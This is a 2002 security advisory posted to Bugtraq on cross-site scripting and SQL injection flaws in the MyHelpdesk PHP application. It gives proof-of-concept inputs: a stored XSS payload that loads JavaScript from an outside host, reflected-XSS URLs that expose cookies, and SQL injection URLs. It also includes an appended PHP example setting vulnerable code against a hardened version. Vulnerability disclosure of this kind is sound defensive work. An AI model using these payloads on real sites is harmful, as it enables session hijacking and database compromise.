From s_alper@hotmail.com Mon Jun 10 16:56:01 2002
From: Ahmet Sabri ALPER
To: bugtraq@securityfocus.com
Date: 10 Jun 2002 11:50:47 -0000
Subject: [ARL02-A15] Multiple Security Issues in MyHelpdesk

+/--------\-------- ALPER Research Labs ------/--------/+
+/---------\------- Security Advisory -----/---------/+
+/----------\------ ID: ARL02-A15 ----/----------/+
+/-----------\----- salper@olympos.org ---/-----------/+

Advisory Information
--------------------

Name               : Multiple Security Issues in MyHelpdesk
Software Package   : MyHelpdesk
Vendor Homepage    : http://myhelpdesk.sourceforge.net/
Vulnerable Versions: v20020509 and older
Platforms          : OS Independent, PHP
Vulnerability Type : Input Validation Error
Vendor Contacted   : 01/06/2002
Vendor Replied     : 02/06/2002
Prior Problems     : N/A
Current Version    : v20020509 (vulnerable)

Summary
-------

MyHelpdesk is a PHP/MySQL helpdesk system based on the OneOrZero Helpdesk but with a different set of features. The system is aimed at the support desk of small organizations.

Multiple cross-site scripting and SQL injection problems exist within MyHelpdesk.

Details
-------

1. When a support assistant creates a new ticket, the Title and Description input is not filtered for malicious code. Both fields therefore allow cross-site scripting attacks which, if exploited correctly, may hand any supporter the administrator password.

Proof-of-concept input for the Title and/or Description fields:

<script src="http://forum.olympos.org/f.js">Alper</script>

2. Maliciously crafted links from third-party sites may allow cross-site scripting attacks. This can be accomplished via three different functions of index.php:

http://[TARGET]/supporter/index.php?t=tickettime&id=<script>alert (document.cookie)</script>
http://[TARGET]/supporter/index.php?t=ticketfiles&id=<script>alert (document.cookie)</script>
http://[TARGET]/supporter/index.php?t=updateticketlog&id=<script>alert (document.cookie)</script>

3. When any ticket is edited, the update section is also not filtered correctly and may carry malicious code.

4. Three different functions of index.php pass user input directly to the SQL query. This makes it possible for attackers to launch SQL injection attacks:

http://[TARGET]/supporter/index.php?t=detailticket&id=root%20me
http://[TARGET]/supporter/index.php?t=editticket&id=got%20root
http://[TARGET]/supporter/index.php?t=updateticketlog&id=without%20me

Solution
--------

The vendor stated in his reply that MyHelpDesk was designed for internal use in small organizations, and that such issues would not do much harm on internal systems.

Workaround: filter the $id, $title and $description variables for malicious code.

Credits
-------

Discovered on 01 June 2002 by Ahmet Sabri ALPER, ALPER Research Labs.

The ALPER Research Labs [ARL] workers are freelance security professionals and white-hat hackers. ARL workers are available for hire for legal work. ARL also supports the open-source community by detecting possible security issues in GPL or other publicly licensed products.

References
----------

Product Web Page: http://myhelpdesk.sourceforge.net/
Olympos: http://www.olympos.org/
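As an added illustration (not MyHelpdesk's own code, which does not appear in this advisory), here is the input-validation pattern behind items 2 and 4 next to the hardened form the workaround asks for, using the page's `t` and `id` parameters; the `tickets` table, the mysqli connection and the credentials are assumptions.

```php
<?php
// Added illustration (not MyHelpdesk's own code): the input-validation
// pattern behind items 2 and 4, using the page's t and id parameters and
// a hypothetical `tickets` table. Assumes a mysqli connection in $db.

// --- Vulnerable pattern: $id is used raw in both SQL and HTML output. ---
function detail_ticket_vulnerable(mysqli $db, string $id): string
{
    // SQL injection: an id such as "root me" is spliced straight into the query.
    $res = $db->query("SELECT title, description FROM tickets WHERE id = $id");
    $row = $res ? $res->fetch_assoc() : null;
    // Cross-site scripting: the raw id and the unfiltered ticket text are echoed.
    return "<h2>Ticket $id</h2><p>" . ($row['description'] ?? '') . '</p>';
}

// --- Hardened pattern: typed id, prepared statement, HTML-escaped output. ---
function detail_ticket_hardened(mysqli $db, string $id): string
{
    // Reject anything that is not a positive integer before it reaches SQL.
    if (!ctype_digit($id) || (int) $id <= 0) {
        http_response_code(400);
        return 'Invalid ticket id.';
    }
    $ticketId = (int) $id;

    // Prepared statement: the value is bound as data, never parsed as SQL.
    $stmt = $db->prepare('SELECT title, description FROM tickets WHERE id = ?');
    $stmt->bind_param('i', $ticketId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    if ($row === null) {
        http_response_code(404);
        return 'No such ticket.';
    }

    // Escape on output so ticket text containing <script> renders as literal text.
    $esc = fn (string $s): string => htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<h2>' . $esc($row['title']) . ' (#' . $ticketId . ')</h2>'
         . '<p>' . $esc($row['description']) . '</p>';
}

// Dispatcher for supporter/index.php?t=detailticket&id=... (placeholder credentials).
$db = new mysqli('localhost', 'helpdesk_user', 'PLACEHOLDER_PASSWORD', 'helpdesk');
$t  = $_GET['t'] ?? '';
$id = $_GET['id'] ?? '';
if ($t === 'detailticket') {
    echo detail_ticket_hardened($db, $id);
}
```

The same two changes, a typed or bound `$id` and escaping of `$title` and `$description` at output time, apply to the `editticket`, `updateticketlog`, `tickettime` and `ticketfiles` functions listed above.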